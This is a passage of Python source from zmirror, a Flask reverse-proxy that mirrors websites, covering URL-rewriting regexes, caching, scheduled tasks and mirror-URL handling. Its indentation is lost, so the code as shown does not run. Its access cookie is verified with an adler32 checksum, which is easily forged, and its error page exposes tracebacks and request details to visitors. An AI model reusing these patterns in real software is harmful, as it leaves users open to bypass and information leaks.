domain_alias_to_target_set = set()  # domains treated as the main domain, e.g. www.google.com and google.com can both be treated as the main domain
domain_alias_to_target_set.add(target_domain)
domains_alias_to_target_domain = list(domains_alias_to_target_domain)
if domains_alias_to_target_domain:
for _domain in domains_alias_to_target_domain:
allowed_domains_set.add(_domain)
domain_alias_to_target_set.add(_domain)
domains_alias_to_target_domain.append(target_domain)
else:
domains_alias_to_target_domain = [target_domain]
my_host_scheme_escaped = my_host_scheme.replace('/', r'\/')
myurl_prefix = my_host_scheme + my_host_name  # http(s)://www.my-mirror-site.com with no trailing slash
myurl_prefix_escaped = myurl_prefix.replace('/', r'\/')
cdn_domains_number = len(CDN_domains)
allowed_remote_response_headers = {
'content-type', 'date', 'expires', 'cache-control', 'last-modified', 'server', 'location',
'accept-ranges',
'access-control-allow-origin', 'access-control-allow-headers', 'access-control-allow-methods',
'access-control-expose-headers', 'access-control-max-age', 'access-control-allow-credentials',
'timing-allow-origin',
}
allowed_remote_response_headers.update(custom_allowed_remote_headers)
# ## Get Target Domain and MyHostName's Root Domain ##
target_domain_root = extract_root_domain(target_domain)[0] # type: str
my_host_name_root = extract_root_domain(my_host_name)[0]  # type: str
# ########## Handle dependencies #############
if not enable_stream_content_transfer:
steamed_mime_keywords = ()
if not url_custom_redirect_enable:
url_custom_redirect_list = {}
url_custom_redirect_regex = ()
shadow_url_redirect_regex = ()
plain_replace_domain_alias = []
if isinstance(plain_replace_domain_alias, tuple):
plain_replace_domain_alias = list(plain_replace_domain_alias)
if not enable_stream_content_transfer:
enable_stream_transfer_async_preload = False
if not enable_automatic_domains_whitelist:
domains_whitelist_auto_add_glob_list = tuple()
if not enable_individual_sites_isolation:
isolated_domains = set()
else:
for isolated_domain in isolated_domains:
if isolated_domain not in external_domains_set:
warnprint('An isolated domain:', isolated_domain,
'would not have effect because it did not appears in the `external_domains` list')
if enable_custom_access_cookie_generate_and_verify:
human_ip_verification_whitelist_from_cookies = False
if not is_use_proxy:
requests_proxies = None
if human_ip_verification_enabled:
buff = []
for network in human_ip_verification_default_whitelist_networks:
buff.append(ipaddress.ip_network(network, strict=False))
human_ip_verification_default_whitelist_networks = tuple(buff)
for question in human_ip_verification_questions:
human_ip_verification_answers_hash_str += question[1]
else:
identity_verify_required = False
human_ip_verification_whitelist_from_cookies = False
must_verify_cookies = False
if not human_ip_verification_whitelist_from_cookies and not enable_custom_access_cookie_generate_and_verify:
must_verify_cookies = False
# ########### Global Variables ###############
# similar in purpose to flask's request variable: stores parsed request information and is referenced frequently throughout the program
parse = ZmirrorThreadLocal()
# task_scheduler
task_scheduler = sched.scheduler(time, sleep)
# records some information about a URL, including whether it should be served via CDN
url_to_use_cdn = LRUDict(40960)
# example of the structure below
url_to_use_cdn["www.fake-domain.com/folder/foo/bar.png"] = [
True, # Should this url use CDN
"image/png", # MIME
17031, # size, if size too small, will not redirect to cdn
]
# records the 100 most recently requested domains, used for domain_guess
# although this is a dict, only the keys matter; the values are unused and are all set to True for now
recent_domains = LRUDict(100)
recent_domains[target_domain] = True
# records already known to domain_guess
# known records are answered with a 307 redirect
domain_guess_cache = LRUDict(1000)
# the format is as follows:
domain_guess_cache[("example.com", "/path/no/query/string")] = "target.domain.com"
# ########### PreCompile Regex ###############
# possible values of a colon (:) are:
# : %3A %253A  see tests.TestRegex.REGEX_POSSIBLE_COLON for the full list
REGEX_COLON = r"""(?::|%(?:25)?3[Aa])"""
# possible values of a slash (/), including upper and lower case, are:
# see tests.TestRegex.REGEX_POSSIBLE_COLON for the full list
# / \/ \\/ \\\(N backslashes)/ %2F %5C%2F %5C%5C(N times 5C)%2F %255C%252F %255C%255C%252F \x2F
REGEX_SLASH = r"""(?:\\*(?:/|x2[Ff])|%(?:(?:25)?5[Cc]%)*(?:25)?2[Ff])"""
# quotes: see tests.TestRegex.REGEX_POSSIBLE_QUOTE for the full list of possible values
# " ' \\(possibly N backslashes)' \\(possibly N backslashes)"
# %22 %27 %5C(possibly N times 5C)%22 %5C(possibly N times 5C)%27
# %2522 %2527 %255C%2522 %255C%2527
# &quot;
REGEX_QUOTE = r"""(?:\\*["']|%(?:(?:25)?5[Cc]%)*2(?:52)?[27]|&quot;)"""
# regex representing this mirror's own hostname
if my_host_port is not None:
REGEX_MY_HOST_NAME = r'(?:' + re.escape(my_host_name_no_port) + REGEX_COLON + re.escape(str(my_host_port)) \
+ r'|' + re.escape(my_host_name_no_port) + r')'
else:
REGEX_MY_HOST_NAME = re.escape(my_host_name)
# Advanced url rewriter, see function response_text_rewrite()
# #### This regex is the absolute core of the whole program: it extracts url-like things from html/css/js ####
# If you need to read this expression, be sure to read it with regex highlighting in an IDE (such as PyCharm)
# This regex does not guarantee that a match is really a url; regex_url_reassemble() performs further validation
regex_adv_url_rewriter = re.compile(
    # prefix, must be one of 'action='(form) 'href='(link) 'src=' 'url('(css) '@import'(css) '":'(js/json, "key":"value")
    # \s means a whitespace character, such as a space or tab
r"""(?P<prefix>\b(?:(?:src|href|action)\s*=|url\s*\(|@import\s*|"\s*:)\s*)""" + # prefix, eg: src=
    # left quote, optional (url() allows omitting the quotes); anything other than url() must have matching quotes on both sides (checked in the rewrite function, since putting it in the regex would hurt readability)
r"""(?P<quote_left>["'])?""" + # quote "'
    # domain and scheme, optional. http:// https:// // http:\/\/ (json) https:\/\/ (json) \/\/ (json)
r"""(?P<domain_and_scheme>(?P<scheme>(?:https?:)?\\?/\\?/)(?P<domain>(?:[-a-z0-9]+\.)+[a-z]+(?P<port>:\d{1,5})?))?""" +
    # url path, including parameters, optional
r"""(?P<path>[^\s;+$?#'"\{}]*?""" + # full path(with query string) /foo/bar.js?love=luciaZ
    # query string, optional
r"""(?P<query_string>\?[^\s?#'"]*?)?)""" + # query string ?love=luciaZ
    # right quote (may be a closing parenthesis), required
r"""(?P<quote_right>["')])(?P<right_suffix>\W)""", # right quote "'
flags=re.IGNORECASE
)
# Response Cookies Rewriter, see response_cookie_rewrite()
regex_cookie_rewriter = re.compile(r'\bdomain=(\.?([\w-]+\.)+\w+)\b', flags=re.IGNORECASE)
regex_cookie_path_rewriter = re.compile(r'(?P<prefix>[pP]ath)=(?P<path>[\w\._/-]+?;)')
# Request Domains Rewriter, see client_requests_text_rewrite()
# This regex matches things like the following
# [[[http(s):]//]www.mydomain.com/]extdomains/(https-)target.com
# and is tolerant of the various urlencode/escape forms
#
# Note: if you want to read the regex below, be sure to do so with regex highlighting in PyCharm,
# otherwise we accept no responsibility for any resulting dizziness or nausea
# After assembly the regex below looks roughly like this (heavily simplified):
# assuming b.test.com is the local hostname
# ((https?:/{2})?b\.test\.com/)?extdomains/(https-)?((?:[\w-]+\.)+\w+)\b
#
# see TestRegex.test__regex_request_rewriter_extdomains() for the corresponding unittest
regex_request_rewriter_extdomains = re.compile(
r"""(?P<domain_prefix>""" +
( # [[[http(s):]//]www.mydomain.com/]
r"""(?P<scheme>""" +
( # [[http(s):]//]
( # [http(s):]
r"""(?:https?(?P<colon>{REGEX_COLON}))?""".format(REGEX_COLON=REGEX_COLON) # https?:
) +
r"""(?P<scheme_slash>%s)(?P=scheme_slash)""" % REGEX_SLASH # //
) +
r""")?""" +
        REGEX_MY_HOST_NAME +  # www.mydomain.com[:port]; this part of the regex is assembled separately above
r"""(?P<slash2>(?(scheme_slash)(?P=scheme_slash)|{REGEX_SLASH}))""".format(REGEX_SLASH=REGEX_SLASH) # # /
) +
r""")?""" +
r"""extdomains(?(slash2)(?P=slash2)|{REGEX_SLASH})(?P<is_https>https-)?""".format(
REGEX_SLASH=REGEX_SLASH) + # extdomains/(https-)
r"""(?P<real_domain>(?:[\w-]+\.)+\w+)\b""", # target.com
flags=re.IGNORECASE,
)
regex_request_rewriter_main_domain = re.compile(REGEX_MY_HOST_NAME)
# The regex below is an *experimental* replacement for response_text_basic_rewrite(),
# used by the function response_text_basic_mirrorlization()
# In theory it is faster than the existing brute-force string replacement when there are many domains, and it can support more powerful domain wildcards in the future
# Added in v0.28.0, enabled by default since v0.28.3
def _regex_generate__basic_mirrorlization():
    """Generate regex_basic_mirrorlization
    It is wrapped in a function because try_match_and_add_domain_to_rewrite_white_list()
    needs to modify external_domains dynamically, after which a new regex may have to be regenerated; wrapping it makes that easier to call
    """
from collections import Counter
# 统计各个后缀出现的频率, 并且按照出现频率降序排列, 有助于提升正则效率
c = Counter(re.escape(x.split(".")[-1]) for x in allowed_domains_set)
regex_all_remote_tld = sorted(list(c.keys()), key=lambda x: c[x], reverse=True)
regex_all_remote_tld = "(?:" + "|".join(regex_all_remote_tld) + ")"
return re.compile(
r"""(?:""" +
( # [[http(s):]//] or [\?["']] or %27 %22 or "
r"""(?P<scheme>""" +
( # [[http(s):]//]
( # [http(s):]
r"""(?:https?(?P<colon>{REGEX_COLON}))?""".format(REGEX_COLON=REGEX_COLON) # https?:
) +
r"""(?P<scheme_slash>%s)(?P=scheme_slash)""" % REGEX_SLASH # //
) +
r""")""" +
r"""|""" +
# [\?["']] or %27 %22 or "
r"""(?P<quote>{REGEX_QUOTE})""".format(REGEX_QUOTE=REGEX_QUOTE)
) +
r""")""" +
# End prefix.
# Begin domain
r"""(?P<domain>([a-zA-Z0-9-]+\.){1,5}%s)\b""" % regex_all_remote_tld +
# Optional suffix slash
r"""(?P<suffix_slash>(?(scheme_slash)(?P=scheme_slash)|{SLASH}))?""".format(SLASH=REGEX_SLASH) +
# right quote (if we have left quote)
r"""(?(quote)(?P=quote))"""
)
regex_basic_mirrorlization = _regex_generate__basic_mirrorlization()
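# --- Illustration (not part of the original module) -----------------------------
# Hedged sketch of the frequency-sorting idea used in
# _regex_generate__basic_mirrorlization(): counting TLD suffixes and putting the
# most common alternatives first lets the regex engine succeed earlier on typical
# input. The domains below are hypothetical placeholders.
if __name__ == "__main__":
    from collections import Counter
    demo_domains = {"a.example.com", "b.example.com", "cdn.example.net"}
    tld_counts = Counter(re.escape(d.split(".")[-1]) for d in demo_domains)
    ordered_tlds = sorted(tld_counts.keys(), key=lambda t: tld_counts[t], reverse=True)
    print("(?:" + "|".join(ordered_tlds) + ")")  # e.g. (?:com|net)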
# used to strip parts like zmirror_verify=75bf23086a541e1f; from cookies
regex_remove__zmirror_verify__header = re.compile(
r"""zmirror_verify=[a-zA-Z0-9]+\b;? ?"""
)
# iterate over and compile the regexes in custom_inject_content
custom_inject_content = custom_inject_content or {}
for k, v in custom_inject_content.items():
if not v:
continue
for a in v:
if a.get("url_regex") is None:
continue
a["url_regex"] = re.compile(a["url_regex"], flags=re.I)
# ########## Flask app ###########
app = Flask( # type: Flask
__name__ if not unittest_mode
else 'unittest' + str(random.random()).replace('.', ''),
static_folder=None,
template_folder=None,
)
# ########## Begin Utils #############
def response_text_basic_mirrorlization(text):
"""
Experimental, upgraded version of response_text_basic_rewrite(), enabled by default.
*v0.28.1.dev*
Earlier versions matched every allowed domain inside the regex; this version matches every
possibly-allowed TLD instead, which brings some performance gains and makes dynamic domain
addition and wildcard support easier.
*v0.28.2*
Further regex optimization, roughly 47% faster (about 4.4x the speed of the old brute-force replacement).
*v0.28.3*
The feature has proven to work well and is promoted from experimental to regular use.
The old response_text_basic_rewrite() was removed; only a backward-compatible alias remains.
:param text: remote response text
:type text: str
:return: rewritten response text
:rtype: str
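Illustrative example (assuming this mirror is served at b.test.com over https and target.com
is an allowed external domain): '<a href="https://target.com/page">' would be rewritten to
something like '<a href="https://b.test.com/extdomains/target.com/page">'.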
"""
def regex_reassemble(m):
remote_domain = get_group("domain", m)
if remote_domain not in allowed_domains_set:
if not enable_automatic_domains_whitelist or \
not try_match_and_add_domain_to_rewrite_white_list(remote_domain):
return m.group()
suffix_slash = get_group("suffix_slash", m)
slash = get_group("scheme_slash", m) or suffix_slash or "/"
colon = get_group("colon", m) or guess_colon_from_slash(slash)
_my_host_name = my_host_name.replace(":", colon) if my_host_port else my_host_name
if remote_domain not in domain_alias_to_target_set:
# 外部域名
core = _my_host_name + slash + "extdomains" + slash + remote_domain + suffix_slash
else:
# 主域名
core = _my_host_name + suffix_slash
quote = get_group("quote", m)
if quote: # "target.domain"
return quote + core + quote
else: # http(s)://target.domain //target.domain
if get_group("colon", m): # http(s)://target.domain
return my_host_scheme.replace(":", colon).replace("/", slash) + core
else: # //target.domain
return slash * 2 + core
return regex_basic_mirrorlization.sub(regex_reassemble, text)
def encoding_detect(byte_content):
"""
Try to detect and return the encoding of a byte string; return None on failure.
:param byte_content: the byte string to be decoded
:type byte_content: bytes
:return: the detected encoding, or None
:rtype: Union[str, None]
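Illustrative example: encoding_detect("简体中文".encode("gbk")) would typically return "gbk",
provided "gbk" is listed in possible_charsets or cchardet is available.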
"""
if force_decode_remote_using_encode is not None:
return force_decode_remote_using_encode
if possible_charsets:
for charset in possible_charsets:
try:
byte_content.decode(encoding=charset)
except:
pass
else:
return charset
if cchardet_available: # detect the encoding using cchardet (if we have)
return c_chardet(byte_content)['encoding']
return None
def cache_clean(is_force_flush=False):
"""
Clean up garbage produced while the program runs; called automatically and periodically.
This covers the various rewrite caches, file caches, etc.
By default only expired entries are cleaned.
:param is_force_flush: ignore expiry times and flush every cache
:type is_force_flush: bool
"""
if enable_connection_keep_alive:
connection_pool.clear(force_flush=is_force_flush)
if local_cache_enable:
cache.check_all_expire(force_flush_all=is_force_flush)
if is_force_flush:
try:
url_to_use_cdn.clear()
is_domain_match_glob_whitelist.cache_clear()
is_mime_streamed.cache_clear()
extract_real_url_from_embedded_url.cache_clear()
embed_real_url_to_embedded_url.cache_clear()
check_global_ua_pass.cache_clear()
is_mime_represents_text.cache_clear()
extract_mime_from_content_type.cache_clear()
is_content_type_using_cdn.cache_clear()
is_ua_in_whitelist.cache_clear()
verify_ip_hash_cookie.cache_clear()
is_denied_because_of_spider.cache_clear()
is_ip_not_in_allow_range.cache_clear()
# client_requests_text_rewrite.cache_clear()
# extract_url_path_and_query.cache_clear()
except: # coverage: exclude
errprint('ErrorWhenCleaningFunctionLruCache')
traceback.print_exc()
def cron_task_container(task_dict, add_task_only=False):
"""
Container for a scheduled (cron-like) task: call the target function, then schedule the next run.
:param task_dict: parameters describing the scheduled task, dict
{ "target": target function (a callable object, not a function-name string)  required,
"interval": delay between runs in seconds  optional,
"priority": priority  optional,
"name": display name of the task  optional,
"args": positional arguments (arg1, arg2)  optional,
"kwargs": keyword arguments {key: value, }  optional,
}
:param add_task_only: only schedule the task, do not execute it now
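Illustrative example (hypothetical parameters):
cron_task_container({"target": cache_clean, "interval": 120, "name": "cache_flush"}, add_task_only=True)
only schedules cache_clean() to run roughly every 120 seconds, without executing it immediately.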
"""
global task_scheduler
if not add_task_only:
# 执行任务
try:
infoprint('CronTask:', task_dict.get('name', str(task_dict['target'])), 'Target:', str(task_dict['target']))
target_func = task_dict.get('target')
if target_func is None:
raise ValueError("target is not given in " + str(task_dict))
target_func(
*(task_dict.get('args', ())), # 解开参数以后传递
**(task_dict.get('kwargs', {}))
)
except: # coverage: exclude
errprint('ErrorWhenProcessingCronTasks', task_dict)
traceback.print_exc()
# 当全局开关关闭时, 自动退出线程
if not enable_cron_tasks:
if threading.current_thread() != threading.main_thread():
exit()
else:
return
# 添加下一次定时任务
task_scheduler.enter(
task_dict.get('interval', 300),
task_dict.get('priority', 999),
cron_task_container,
(task_dict,)
)
def cron_task_host():
"""定时任务宿主, 每分钟检查一次列表, 运行时间到了的定时任务"""
while True:
# 当全局开关关闭时, 自动退出线程
if not enable_cron_tasks:
if threading.current_thread() != threading.main_thread():
exit()
else:
return
sleep(60)
try:
task_scheduler.run()
except: # coverage: exclude
errprint('ErrorDuringExecutingCronTasks')
traceback.print_exc()
def add_temporary_domain_alias(source_domain, replaced_to_domain):
"""
Add an entry to the temporary domain-replacement list.
Used for plain-text domain replacement, see the `plain_replace_domain_alias` option.
:param source_domain: the domain to be replaced
:param replaced_to_domain: the domain to replace it with
:type source_domain: str
:type replaced_to_domain: str
"""
if parse.temporary_domain_alias is None:
parse.temporary_domain_alias = []
else:
parse.temporary_domain_alias = list(parse.temporary_domain_alias)
parse.temporary_domain_alias.append((source_domain, replaced_to_domain))
dbgprint('A domain', source_domain, 'to', replaced_to_domain, 'added to temporary_domain_alias',
parse.temporary_domain_alias)
def is_external_domain(domain):
"""是否是外部域名"""
return domain not in domains_alias_to_target_domain
# noinspection PyGlobalUndefined
def try_match_and_add_domain_to_rewrite_white_list(domain, force_add=False):
"""
If the domain matches one of the wildcards in `domains_whitelist_auto_add_glob_list`,
add it to the external_domains list; domains in that list get the URL-rewrite treatment.
Used to add domains to external_domains dynamically while the program is running,
and may also be called from external functions (custom_func.py).
For more details about external_domains, see the corresponding documentation in default_config.py.
:type domain: str
:type force_add: bool
:rtype: bool
"""
global external_domains, external_domains_set, allowed_domains_set, prefix_buff
global regex_basic_mirrorlization
if domain is None or not domain:
return False
if domain in allowed_domains_set:
return True
if not force_add and not is_domain_match_glob_whitelist(domain):
return False
infoprint('A domain:', domain, 'was added to external_domains list')
_buff = list(external_domains) # external_domains是tuple类型, 添加前需要先转换
_buff.append(domain)
external_domains = tuple(_buff) # 转换回tuple, tuple有一些性能优势
external_domains_set.add(domain)
allowed_domains_set.add(domain)
prefix_buff[domain] = calc_domain_replace_prefix(domain)
# 重新生成匹配正则
regex_basic_mirrorlization = _regex_generate__basic_mirrorlization()
# write log
try:
with open(zmirror_root('automatic_domains_whitelist.log'), 'a', encoding='utf-8') as fp:
fp.write(domain + '\n')
except: # coverage: exclude
traceback.print_exc()
return True
def decode_mirror_url(mirror_url=None):
"""
Parse a mirror url (which may contain /extdomains/) and extract the original url information.
It does not have to be a full url; the path part is enough (a query string is also accepted).
If the argument is omitted, the url currently being requested by the user is used.
JSON input is supported (the \/ and \. escapes are handled).
:rtype: dict[str, Union[str, bool]]
:return: {'domain':str, 'is_https':bool, 'path':str, 'path_query':str}
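Illustrative example (assuming accounts.google.com is a configured external domain):
decode_mirror_url('/extdomains/accounts.google.com/search?q=1') would yield roughly
{'domain': 'accounts.google.com', 'is_https': <per-domain setting>, 'path': '/search', 'path_query': '/search?q=1'}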
"""
_is_escaped_dot = False
_is_escaped_slash = False
result = {}
if mirror_url is None:
input_path_query = extract_url_path_and_query() # type: str
else:
if r'\/' in mirror_url: # 如果 \/ 在url中, 先反转义, 处理完后再转义回来
_is_escaped_slash = True
mirror_url = mirror_url.replace(r'\/', '/')
if r'\.' in mirror_url: # 如果 \. 在url中, 先反转义, 处理完后再转义回来
_is_escaped_dot = True
mirror_url = mirror_url.replace(r'\.', '.')
input_path_query = extract_url_path_and_query(mirror_url) # type: str
if input_path_query[:12] == '/extdomains/':
# 12 == len('/extdomains/')
split = urlsplit("//" + input_path_query[12:].lstrip("/")) # type: urllib.parse.SplitResult
real_domain = split.netloc
real_path_query = (split.path or "/") + (("?" + split.query) if split.query else "")
if real_domain[:6] == 'https-':
# 如果显式指定了 /extdomains/https-域名 形式(为了兼容老版本)的, 那么使用https
real_domain = real_domain[6:]
_is_https = True
else:
# 如果是 /extdomains/域名 形式, 没有 "https-" 那么根据域名判断是否使用HTTPS
_is_https = is_target_domain_use_https(real_domain)
real_path_query = client_requests_text_rewrite(real_path_query)
if _is_escaped_dot: real_path_query = real_path_query.replace('.', r'\.')
if _is_escaped_slash: real_path_query = s_esc(real_path_query)
result['domain'] = real_domain
result['is_https'] = _is_https
result['path_query'] = real_path_query
result['path'] = urlsplit(result['path_query']).path
return result
input_path_query = client_requests_text_rewrite(input_path_query)
if _is_escaped_dot: input_path_query = input_path_query.replace('.', r'\.')
if _is_escaped_slash: input_path_query = s_esc(input_path_query)
result['domain'] = target_domain
result['is_https'] = (target_scheme == 'https://')
result['path_query'] = input_path_query
result['path'] = urlsplit(result['path_query']).path
return result
# function alias, kept for compatibility with configs from earlier versions
extract_from_url_may_have_extdomains = decode_mirror_url
# noinspection PyShadowingNames
def encode_mirror_url(raw_url_or_path, remote_domain=None, is_scheme=None, is_escape=False):
"""convert url from remote to mirror url
:type raw_url_or_path: str
:type remote_domain: str
:type is_scheme: bool
:type is_escape: bool
:rtype: str
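Illustrative example (assuming accounts.google.com is an allowed external domain):
encode_mirror_url('https://accounts.google.com/search?q=1') would yield roughly
myurl_prefix + '/extdomains/accounts.google.com/search?q=1'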
"""
if is_escape:
_raw_url_or_path = raw_url_or_path.replace(r'\/', '/')  # unescape \/ first; the result is re-escaped at the end via s_esc()
else:
_raw_url_or_path = raw_url_or_path
sp = urlsplit(_raw_url_or_path)
if '/extdomains/' == sp.path[:12]:
return raw_url_or_path
domain = remote_domain or sp.netloc or parse.remote_domain or target_domain
if domain not in allowed_domains_set:
return raw_url_or_path
if is_scheme is not False:
if _raw_url_or_path[:2] == '//':
our_prefix = '//' + my_host_name
elif is_scheme or sp.scheme:
our_prefix = myurl_prefix
else:
our_prefix = ''
else:
our_prefix = ''
if is_external_domain(domain):
middle_part = '/extdomains/' + domain
else:
middle_part = ''
result = urljoin(our_prefix + middle_part + '/',
extract_url_path_and_query(_raw_url_or_path).lstrip('/'))
if is_escape:
result = s_esc(result)
return result
# function alias, kept for compatibility with configs from earlier versions
convert_to_mirror_url = encode_mirror_url
def is_target_domain_use_https(domain):
"""请求目标域名时是否使用https"""
if force_https_domains == 'NONE':
return False
if force_https_domains == 'ALL':
return True
if domain in force_https_domains:
return True
else:
return False
def add_ssrf_allowed_domain(domain):
"""添加域名到ssrf白名单, 不支持通配符
:type domain: str
"""
global allowed_domains_set
allowed_domains_set.add(domain)
def dump_zmirror_snapshot(folder="error_dump", msg=None, our_response=None):
"""
Dump the current state to a file.
:param folder: folder name
:type folder: str
:param our_response: the Flask response object, optional
:type our_response: Response
:param msg: extra information
:type msg: str
:return: absolute path of the dumped file
:rtype: Union[str, None]
"""
import pickle
try:
if not os.path.exists(zmirror_root(folder)):
os.mkdir(zmirror_root(folder))
_time_str = datetime.now().strftime('snapshot_%Y-%m-%d_%H-%M-%S')
import config
snapshot = {
"time": datetime.now(),
"parse": parse.dump(),
"msg": msg,
"traceback": traceback.format_exc(),
"config": attributes(config, to_dict=True),
"FlaskRequest": attributes(request, to_dict=True),
}
if our_response is not None:
our_response.freeze()
snapshot["OurResponse"] = our_response
dump_file_path = os.path.abspath(os.path.join(zmirror_root(folder), _time_str + '.dump'))
with open(dump_file_path, 'wb') as fp:
pickle.dump(snapshot, fp, pickle.HIGHEST_PROTOCOL)
return dump_file_path
except:
return None
def generate_error_page(errormsg='Unknown Error', error_code=500, is_traceback=False, content_only=False):
"""
:type content_only: bool
:type errormsg: Union[str, bytes]
:type error_code: int
:type is_traceback: bool
:rtype: Union[Response, str]
"""
if is_traceback:
traceback.print_exc()
errprint(errormsg)
if isinstance(errormsg, bytes):
errormsg = errormsg.decode()
dump_file_path = dump_zmirror_snapshot(msg=errormsg)
request_detail = ""
for attrib in filter(lambda x: x[0] != '_' and x[-2:] != '__', dir(parse)):
request_detail += "<tr><td>{attrib}</td><td>{value}</td></tr>" \
.format(attrib=attrib, value=html_escape(str(parse.__getattribute__(attrib))))
error_page = """<!doctype html><html lang="zh-CN"><head><meta charset="UTF-8">
<title>zmirror internal error</title>
<style>code{{background-color: #cccaca;}}</style>
</head>
<body>
<h1>zmirror internal error</h1>
A fatal error occurred. 服务器中运行的zmirror出现一个内部错误.<br>
<hr>
<h2>If you are visitor 如果你是访客</h2>
This site is temporarily unavailable because of an internal error<br>
Please contact your site admin. <br>
该镜像站暂时出现了临时的内部故障, 请联系网站管理员<br>
<hr>
<h2>If you are admin</h2>
You can find full detail log in your server's log.<br>
For apache, typically at <code>/var/log/apache2/YOUR_SITE_NAME_error.log</code><br>
tips: you can use <code>tail -n 100 -f YOUR_SITE_NAME_error.log</code> to view real-time log<br>
<br>
If you can't solve it by your self, here are some ways may help:<br>
<ul>
<li>contact the developer by email: <a href="mailto:i@z.codes" target="_blank">aploium <i@z.codes></a></li>
<li>seeking for help in zmirror's <a href="https://gitter.im/zmirror/zmirror" target="_blank">online chat room</a></li>
<li>open an <a href="https://github.com/aploium/zmirror/issues" target="_blank">issue</a> (as a bug report) on GitHub</li>
</ul>
<h3>Snapshot Dump</h3>
A snapshot has been dumped to <code>{dump_file_path}</code> <br>
You can load it using (Python3 code) <code>pickle.load(open(r"{dump_file_path}","rb"))</code><br>
The snapshot contains information which may be helpful for debugging
<h3>Detail</h3>
<table border="1"><tr><th>Attrib</th><th>Value</th></tr>
{request_detail}
</table>
<h3>Additional Information</h3>
<pre>{errormsg}</pre>
<h3>Traceback</h3>
<pre>{traceback_str}</pre>
<hr>
<div style="font-size: smaller">Powered by <em>zmirror {version}</em><br>
<a href="{official_site}" target="_blank">{official_site}</a></div>
</body></html>""".format(
errormsg=errormsg, request_detail=request_detail,
traceback_str=html_escape(traceback.format_exc()) if is_traceback else 'None or not displayed',
dump_file_path=dump_file_path,
version=CONSTS.__VERSION__, official_site=CONSTS.__GITHUB_URL__
)
if not content_only:
return make_response(error_page.encode(), error_code)
else:
return error_page
def generate_304_response(_content_type=None):
""":rtype Response"""
r = Response(content_type=_content_type, status=304)
r.headers.add('X-Cache', 'FileHit-304')
return r
def generate_ip_verify_hash(input_dict):
"""
Generate a hash that identifies the user.
Used by the human_ip_verification feature.
The hash consists of two hex parts, where
hash(first part + salt) = second part; this property is used for verification.
:rtype str
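Sketch of the scheme (as implemented below): the first part is the adler32 hex digest of
(salt + submitted answers + a random number); the second part is the adler32 hex digest of
(first part + salt). verify_ip_hash_cookie() only has to recompute the second part from the
first, so the random component never needs to be stored server-side.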
"""
strbuff = human_ip_verification_answers_hash_str
for key in input_dict:
strbuff += key + input_dict[key] + str(random.randint(0, 9000000))
input_key_hash = hex(zlib.adler32(strbuff.encode(encoding='utf-8')))[2:]
while len(input_key_hash) < 7:
input_key_hash += '0'
output_hash = hex(zlib.adler32((input_key_hash + human_ip_verification_answers_hash_str).encode(encoding='utf-8')))[2:]
while len(output_hash) < 7:
output_hash += '0'
return input_key_hash + output_hash
@lru_cache(maxsize=1024)
def verify_ip_hash_cookie(hash_cookie_value):
"""
Decide from the hash in the cookie whether the user is allowed access.
Used by the human_ip_verification feature.
The cookie value consists of two hex parts, where
hash(first part + salt) = second part; this property is what gets verified.
:type hash_cookie_value: str
:rtype: bool
"""
try:
input_key_hash = hash_cookie_value[:8]
output_hash = hash_cookie_value[8:]
calculated_hash = hex(zlib.adler32(
(input_key_hash + human_ip_verification_answers_hash_str).encode(encoding='utf-8')
))[2:]
if output_hash == calculated_hash:
return True
else:
return False
except:
return False
def update_content_in_local_cache(url, content, method='GET'):
"""更新 local_cache 中缓存的资源, 追加content
在stream模式中使用"""
if local_cache_enable and method == 'GET' and cache.is_cached(url):
info_dict = cache.get_info(url)
resp = cache.get_obj(url)
resp.set_data(content)
# When a stored resource has no complete content yet, without_content is set to True
# and the cache entry is not effective; it only becomes effective once the content is added.
# In stream mode the HTTP headers arrive first and the body afterwards, so a header-only
# response may be cached first, and the content is appended here once it has been fully received.
info_dict['without_content'] = False
if verbose_level >= 4: dbgprint('LocalCache_UpdateCache', url, content[:30], len(content))
cache.put_obj(
url,
resp,
obj_size=len(content),
expires=get_expire_from_mime(parse.mime),
last_modified=info_dict.get('last_modified'),
info_dict=info_dict,
)
def put_response_to_local_cache(url, _our_resp, without_content=False):
"""
put our response object(headers included) to local cache
:param without_content: for stream mode use
:param url: client request url
:param _our_resp: our response (flask Response object) to the client; it will be stored
:type url: str
:type _our_resp: Response
:type without_content: bool
"""
# Only cache GET method, and only when remote returns 200(OK) status
if parse.method != 'GET' or _our_resp.status_code != 200:
return
dbgprint('PuttingCache:', url, "without_content:", without_content)
if without_content:
our_resp = copy.copy(_our_resp)
our_resp.response = None # delete iterator
obj_size = 0
else:
our_resp = _our_resp
obj_size = len(parse.remote_response.content)
# requests' header are CaseInsensitive
last_modified = parse.remote_response.headers.get('Last-Modified', None)
cache.put_obj(
url,
our_resp,
expires=get_expire_from_mime(parse.mime),
obj_size=obj_size,
last_modified=last_modified,
info_dict={'without_content': without_content,
'last_modified': last_modified,
},
)
def try_get_cached_response(url, client_header=None):
"""
Try to retrieve a response from the local cache.
:param url: real url with query string
:type client_header: dict
:rtype: Union[Response, None]
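Illustrative behaviour: on a cache hit with a matching If-Modified-Since header, a bare 304
response is returned; on a normal hit, the cached Response object is returned with an extra
"x-zmirror-cache: FileHit" header.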
"""
# Only use cache when client use GET
if local_cache_enable and parse.method == 'GET' and cache.is_cached(url):
if client_header is not None and 'if-modified-since' in client_header and \
cache.is_unchanged(url, client_header.get('if-modified-since', None)):
dbgprint('FileCacheHit-304', url)
return generate_304_response()
else:
cached_info = cache.get_info(url)
if cached_info.get('without_content', True):
# see update_content_in_local_cache() for an explanation of without_content
return None
# dbgprint('FileCacheHit-200')
resp = cache.get_obj(url)
assert isinstance(resp, Response)
parse.set_extra_resp_header('x-zmirror-cache', 'FileHit')
return resp
else:
return None
def regex_url_reassemble(match_obj):
"""
Reassemble url parts split by the regex.
:param match_obj: match object of stdlib re
:return: reassembled url string (including the prefix (url= etc.) and suffix)
:rtype: str
"""
prefix = get_group('prefix', match_obj)
quote_left = get_group('quote_left', match_obj)
quote_right = get_group('quote_right', match_obj)
path = get_group('path', match_obj)
match_domain = get_group('domain', match_obj)
scheme = get_group('scheme', match_obj)
whole_match_string = match_obj.group()
# dbgprint('prefix', prefix, 'quote_left', quote_left, 'quote_right', quote_right,
# 'path', path, 'match_domain', match_domain, 'scheme', scheme, 'whole', whole_match_string, v=5)
if r"\/" in path or r"\/" in scheme:
require_slash_escape = True
path = path.replace(r"\/", "/")
# domain_and_scheme = domain_and_scheme.replace(r"\/", "/")
else:
require_slash_escape = False
# path must be not blank
if (not path # path is blank
# only url(something) and @import are allowed to be unquoted
or ('url' not in prefix and 'import' not in prefix) and (not quote_left or quote_right == ')')
